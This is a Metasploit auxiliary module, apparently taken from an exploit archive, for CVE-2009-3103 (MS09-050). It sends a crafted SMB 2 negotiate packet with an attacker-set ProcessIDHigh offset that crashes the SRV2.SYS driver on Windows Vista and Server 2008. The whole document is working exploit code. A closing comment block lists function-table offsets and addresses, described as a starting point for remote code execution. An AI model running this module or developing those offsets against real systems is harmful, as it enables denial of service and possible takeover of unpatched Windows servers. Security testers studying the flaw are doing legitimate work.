Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',  
'Description' => %q{  
This module exploits an out of bounds function table dereference in the SMB  
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7  
release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista  
without SP1 does not seem affected by this flaw.  
},  
  
'Author' => [ 'Laurent Gaffie <laurent.gaffie[at]gmail.com>', 'hdm' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2009-3103'],  
['BID', '36299'],  
['OSVDB', '57799'],  
['MSB', 'MS09-050'],  
['URL', 'https://seclists.org/fulldisclosure/2009/Sep/39']  
]  
))  
register_options([  
Opt::RPORT(445),  
OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])  
])  
  
end  
  
  
def run  
connect()  
  
# The SMB 2 dialect must be there  
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']  
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')  
  
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct  
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE  
pkt['Payload']['SMB'].v['Flags1'] = 0x18  
pkt['Payload']['SMB'].v['Flags2'] = 0xc853  
pkt['Payload'].v['Payload'] = data  
  
pkt['Payload']['SMB'].v['ProcessIDHigh'] = datastore['OFFSET'].to_i  
pkt['Payload']['SMB'].v['ProcessID'] = 0  
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)  
  
print_status("Sending request and waiting for a reply...")  
sock.put(pkt.to_s)  
r = sock.get_once  
  
if(not r)  
print_status("The target system has likely crashed")  
else  
print_status("Response received: #{r.inspect}")  
end  
  
disconnect()  
end  
end  
  
=begin  
  
Gaining code execution means pointing the offset to something that  
eventually causes us to run arbitrary code. The offsets below are  
a starting point for turning this into remote code execution.  
  
Offsets on Vista SP1 x64:  
0x1B = "SMB 2.002"  
0x1D = L"SMB2Validate"  
0x1E = L"SMB2Execute"  
0x31 = move eax, 0x00000002 + ret # causes a hang when reaced  
0x58 = WmiQueryTraceInformation  
0x59 = WmiTraceMessage  
0x66 = ExAllocatePoolWithTag  
0x67 = ExFreePool  
0x76 = ExAllocatePoolWithTag  
0x77 = ExFreePool  
0x86 = ExAllocatePoolWithTag  
0x87 = ExFreePoo  
0x96 = ExAllocatePoolWithTag  
0x97 = ExFreePoo  
0xa6 = ExAllocatePoolWithTag  
0xa7 = ExFreePoo  
0xb9 = BugCheckEx  
0xc7 = SrvBalanceCredits  
0xdf = SrvNetStatistics data  
0xe0 = SrvNetStatisticsLock  
0x010e = SrvSnapShotScaevengerThread  
0x011c = SrvSnapShotScavengerTimer  
0x012a = SrvScavengerThread  
0x0138 = SrvScavengerTimer  
0x0146 = SrvScavengeDurableHandles  
0x0157 = SrvScavengeDurableHandlesTimer  
0x0166 = SrvProcessOplockBreaks  
0x0179 = SrvProcessOplockBreakTimer  
0x0185 = L"XactSrv"  
0x01f8 = WppTraceCallback  
  
  
Offsets on Vista SP1 (no updates) x86:  
  
0x64 = mov esp, ebp; pop ebp, ret  
0xde = pool with tag  
  
0 -> 99b51d6e - 8bff558bec5153568b75088b46308b98  
1 -> 99b55967 - 8bff558bec51518b45088b48308b8958  
2 -> 99b53e19 - 8bff558bec568b75088b4e7083791444  
3 -> 99b55811 - 8bff558bec5151538b5d088b43708378  
4 -> 99b53d54 - 8bff558bec56578b7d088b4770837814  
5 -> 99b54d41 - 8bff558bec83ec145356578b7d088b47  
6 -> 99b54c81 - 8bff558bec518b4d088b816c01000053  
7 -> 99b66c44 - 8bff558bec518b4d088b816c01000053  
8 -> 99b655bf - 8bff558bec518b55088b427083781471  
9 -> 99b63ce4 - 8bff558bec518b4d088b816c01000053  
10 -> 99b5a221 - 8bff558bec518b4d088b816c01000053  
11 -> 99b62996 - 8bff558bec518b4d088b816c01000053  
12 -> 99b5fab5 - 8bff558bec518b4d088b816c01000053  
25 -> 819aca26 - 6a2468d0988981e8960beeff33d28955  
26 -> 8186c78b - 8bff558bec83e4f86a008d451c50ff75  
62 -> 80d40f20 - 0000000000eb45000000000000000000  
116 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b  
117 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d  
166 -> 819273b7 - 8bff558bec83e4f883ec3c538b5d088b  
167 -> 8192739f - 8bff558bec6a00ff7508e8df0a00005d  
194 -> 99b6b74c - 8bff558bec83ec0c0fb64d088b451c53  
195 -> 99b683f0 - 943018c0c6fd3f49a3e8697224f83f6f  
206 -> 99b5eeb5 - 8bff558bec83ec1ca11094b69953568b  
217 -> 99b5eea0 - 6a0168809ab699ff151880b699c21000  
226 -> 99b5211d - 8bff558bec83ec145356578d45f450c6  
231 -> 8192fcd0 - 0000000014fd9281ffffffff04000000  
237 -> 99b52108 - 6a0168009bb699ff151880b699c21000  
382 -> 8b137500 - 000000009075138b0000000000000000  
491 -> 8599b680 - 894518e82ee2ffff3b45087341ff7520  
646 -> c000009a - 0000ffffffff80040000ffffffff8004  
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe  
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c  
804 -> 830ffc7d - 0000001722268b3e012004020010c01c  
  
  
=end  
`